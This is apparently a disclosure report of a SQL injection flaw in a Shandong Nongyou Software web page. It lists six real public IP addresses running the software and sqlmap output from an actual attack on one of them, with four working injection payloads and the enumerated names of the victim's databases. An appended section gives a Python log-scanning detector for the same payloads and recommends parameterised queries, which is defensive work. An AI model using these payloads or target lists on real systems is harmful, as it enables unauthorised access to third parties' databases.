### Summary:

See title.

### Details:

Official site of Shandong Nongyou Software Co.: http://www.nongyou.com.cn/

Affected instances:

- http://222.135.76.147:8200/ckq/jwhkzjdlist.aspx?tname=宁津办事处&CountryName=所前王家
- http://60.217.72.17:7117/ckq/jwhkzjdlist.aspx?tname=山头办&CountryName=河北西社区
- http://218.58.124.131:8003/ckq/jwhkzjdlist.aspx?tname=综合保税物流片区&CountryName=北岭村
- http://218.56.40.229:8013/ckq/jwhkzjdlist.aspx?tname=昆嵛镇&CountryName=滩上
- http://218.56.99.84:8003/ckq/jwhkzjdlist.aspx?tname=昆仑镇&CountryName=河石坞村
- http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村

1. Test the injection point: http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村

![3.png](https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png)

The `tname` parameter is injectable; sqlmap confirms four techniques (boolean-based blind, error-based, stacked queries and time-based blind) and the back end is MySQL behind ASP.NET on IIS 7.0:

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: tname=????' RLIKE (SELECT (CASE WHEN (9506=9506) THEN CONVERT(0xe5a4a7e5bca0e5ba84e99587 USING utf8) ELSE 0x28 END)) AND 'Jfto'='Jfto&CountryName=???

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=????' AND (SELECT 1011 FROM(SELECT COUNT(*),CONCAT(0x716c626371,(SELECT (CASE WHEN (1011=1011) THEN 1 ELSE 0 END)),0x7179687571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pobb'='pobb&CountryName=???

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: tname=????'; SELECT SLEEP(5)-- &CountryName=???

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tname=????' AND SLEEP(5) AND 'jMaG'='jMaG&CountryName=???
---
[17:18:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
[17:18:08] [INFO] fetching database names
[17:18:13] [INFO] the SQL query used returns 658 entries
[17:18:13] [INFO] retrieved: information_schema
[17:18:13] [INFO] retrieved: cw_databasecomm22yiyuanxian
[17:18:13] [INFO] retrieved: cw_databasecommzbyiyuanxian
[17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100012
[17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100015
[17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100030
[17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100031
[17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100041
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100042
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100043
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100044
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100046
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100047
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100048
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100055
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100060
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100061
[17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100063
[17:18:14] [WARNING] user aborted during enumeration. sqlmap will display partial output
available databases [18]:
[*] cw_databasecomm22yiyuanxian
[*] cw_databasecommzbyiyuanxian
[*] cwdbcommzbyiyuanxian100012
[*] cwdbcommzbyiyuanxian100015
[*] cwdbcommzbyiyuanxian100030
[*] cwdbcommzbyiyuanxian100031
[*] cwdbcommzbyiyuanxian100041
[*] cwdbcommzbyiyuanxian100042
[*] cwdbcommzbyiyuanxian100043
[*] cwdbcommzbyiyuanxian100044
[*] cwdbcommzbyiyuanxian100046
[*] cwdbcommzbyiyuanxian100047
[*] cwdbcommzbyiyuanxian100048
[*] cwdbcommzbyiyuanxian100055
[*] cwdbcommzbyiyuanxian100060
[*] cwdbcommzbyiyuanxian100061
[*] cwdbcommzbyiyuanxian100063
[*] information_schema
[17:18:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[17:18:14] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\222.134.154.214'
```

All of the listed instances reproduce.

### Proof of vulnerability:

1. Test the injection point: http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村

![3.png](https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png)

Running sqlmap against this point gives the output shown under Details: the `tname` parameter is injectable by all four techniques and the database list is enumerable.
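For operators of an affected instance, the sqlmap output above is also a detection signature. The following Python sketch is an added example, not part of the original report or of the vendor's software: it scans IIS W3C log lines (the field order `date time c-ip cs-method cs-uri-stem cs-uri-query sc-status` is an assumption), URL-decodes each query-string parameter and flags the payload shapes sqlmap used (quote break followed by `AND`/`OR`/`RLIKE`, `SLEEP(`, stacked `; SELECT`, `FLOOR(RAND(`, `INFORMATION_SCHEMA`, long hex literals), and separately counts HTTP 5xx responses per client and page, since the error-based technique left 19 HTTP 500s in the report's run. Only the page path and the parameter names `tname` and `CountryName` come from the report; the log lines, client addresses and timestamps are constructed for the example.

```python
"""Log-side detection for the injection pattern in this report (added example,
not part of the original report or the vendor's software). Assumed input: IIS
W3C lines with fields  date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
Sample lines are constructed; only the page path and the parameter names
(tname, CountryName) come from the report."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Payload shapes taken from the sqlmap output above: quote break followed by a
# boolean/regex operator, SLEEP() delays, stacked queries, the error-based
# FLOOR(RAND()) trick, INFORMATION_SCHEMA enumeration and long hex literals.
SQLI_PATTERNS = {
    "quote_break":   re.compile(r"'\s*(AND|OR|RLIKE)\b", re.I),
    "time_delay":    re.compile(r"\bSLEEP\s*\(", re.I),
    "stacked_query": re.compile(r";\s*SELECT\b", re.I),
    "error_based":   re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "schema_enum":   re.compile(r"\bINFORMATION_SCHEMA\b", re.I),
    "hex_literal":   re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def split_query(query):
    """Yield (name, value) pairs. Split on '&' only (stacked queries contain ';')
    and decode twice so double-encoded payloads are inspected in clear."""
    if query == "-":  # IIS logs '-' for an empty query string
        return
    for part in query.split("&"):
        name, _, value = part.partition("=")
        yield unquote_plus(name), unquote_plus(unquote_plus(value))


def classify_query(query):
    """Map each parameter name to the labels of the patterns its value matches."""
    findings = {}
    for name, value in split_query(query):
        labels = [lbl for lbl, pat in SQLI_PATTERNS.items() if pat.search(value)]
        if labels:
            findings[name] = labels
    return findings


def analyse(lines, error_threshold=10):
    """Return (alerts, noisy): alerts is one (ip, stem, findings) per request
    carrying a payload; noisy lists (ip, stem) pairs with at least
    error_threshold HTTP 5xx responses, the trail error-based probing leaves
    (the report counts 19 HTTP 500s during its run)."""
    alerts, errors = [], Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip headers, comments and malformed lines
        rec = m.groupdict()
        findings = classify_query(rec["query"])
        if findings:
            alerts.append((rec["ip"], rec["stem"], findings))
        if int(rec["status"]) >= 500:
            errors[(rec["ip"], rec["stem"])] += 1
    noisy = [key for key, n in errors.items() if n >= error_threshold]
    return alerts, noisy


# Constructed sample traffic: BENIGN is the report's own example query URL-encoded;
# PAYLOADS are URL-encoded forms of the four shapes sqlmap reported (the
# error-based one shortened). Client addresses are documentation-range values.
STEM = "/ckq/jwhkzjdlist.aspx"
BENIGN = "tname=%E5%A4%A7%E5%BC%A0%E5%BA%84%E9%95%87&CountryName=%E8%83%9C%E5%88%A9%E6%9D%91"
PAYLOADS = [
    "tname=%E5%A4%A7'+RLIKE+(SELECT+(CASE+WHEN+(9506%3D9506)+THEN+CONVERT(0xe5a4a7e5bca0e5ba84e99587+USING+utf8)+ELSE+0x28+END))+AND+'Jfto'%3D'Jfto&CountryName=x",
    "tname=%E5%A4%A7'+AND+(SELECT+1011+FROM(SELECT+COUNT(*),CONCAT(0x716c626371,1,0x7179687571,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'pobb'%3D'pobb&CountryName=x",
    "tname=%E5%A4%A7';+SELECT+SLEEP(5)--+&CountryName=x",
    "tname=%E5%A4%A7'+AND+SLEEP(5)+AND+'jMaG'%3D'jMaG&CountryName=x",
]


def sample_log():
    """One benign request, the four payload shapes, then 19 error-based probes
    that each drew an HTTP 500."""
    lines = [f"2014-12-31 17:18:00 192.0.2.10 GET {STEM} {BENIGN} 200"]
    for i, q in enumerate(PAYLOADS, start=1):
        lines.append(f"2014-12-31 17:18:{i:02d} 198.51.100.5 GET {STEM} {q} 200")
    for i in range(19):
        lines.append(f"2014-12-31 17:18:{5 + i:02d} 198.51.100.5 GET {STEM} {PAYLOADS[1]} 500")
    return lines


if __name__ == "__main__":
    alerts, noisy = analyse(sample_log())
    print(f"{len(alerts)} requests carried injection payloads; error bursts from: {noisy}")
    for ip, stem, findings in alerts[:4]:
        print(f"  {ip} {stem} {findings}")
```

The benign request (the report's own `tname=大张庄镇&CountryName=胜利村`) produces no finding, each of the four sqlmap payload shapes is labelled, and the burst of HTTP 500s is attributed to one client and page. Rules like these only tell you that probing happened; the durable fix is in the page's data access code, where `tname` and `CountryName` must be bound as query parameters rather than concatenated into the SQL string.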